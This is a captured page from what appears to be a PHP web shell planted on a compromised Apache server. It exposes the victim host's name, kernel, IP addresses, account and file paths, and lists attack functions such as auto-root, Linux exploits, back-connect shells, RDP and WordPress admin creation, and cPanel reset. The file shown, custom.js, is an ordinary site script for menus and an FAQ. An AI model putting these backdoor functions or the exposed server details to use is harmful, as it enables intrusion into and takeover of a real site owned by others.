Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.138.119.50
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
iTailor-gold /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
custom.js
2.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom.js
document.addEventListener('DOMContentLoaded', function () { const header = document.querySelector('.header-gold'); const hamburger = document.querySelector('.hamburger'); const menu = document.querySelector('.asdh_ul'); hamburger.addEventListener('click', function () { this.classList.toggle('active-mm'); menu.classList.toggle('active-mm'); header.classList.toggle('active-mm'); }); }); // Get all elements with the class "asd_li_faq" var faqItems = document.querySelectorAll('.asd_li_faq'); // Add click event listener to each faq item faqItems.forEach(function(item) { item.addEventListener('click', function() { // Toggle the "active" class this.classList.toggle('active'); // Find the ".asd_ans" element inside the clicked faq item and toggle its visibility var answer = this.querySelector('.asd_ans'); if (answer) { if (answer.style.display === 'none') { answer.style.display = 'block'; } else { answer.style.display = 'none'; } } }); }); // Hide all elements with the class "asd_ans" except the first one var answerItems = document.querySelectorAll('.asd_ans'); for (var i = 1; i < answerItems.length; i++) { answerItems[i].style.display = 'none'; } var closeButton = document.querySelector('.close'); if (closeButton) { // If it exists, add the click event listener to pause the video closeButton.addEventListener('click', function() { var video = document.getElementById('myVideo'); video.pause(); }); } AOS.init({ easing: 'ease-out-back', duration: 1200, }) // Initialize the plugin on the input field var input = document.querySelector("#phone"); if (input) { var iti = window.intlTelInput(input, { separateDialCode: true, // Display country code separately utilsScript: "https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.13/js/utils.js" // Required for formatting and validation }); // Access the selected country code input.addEventListener("countrychange", function() { var countryCode = iti.getSelectedCountryData().dialCode; console.log("Selected country code:", countryCode); }); }
Close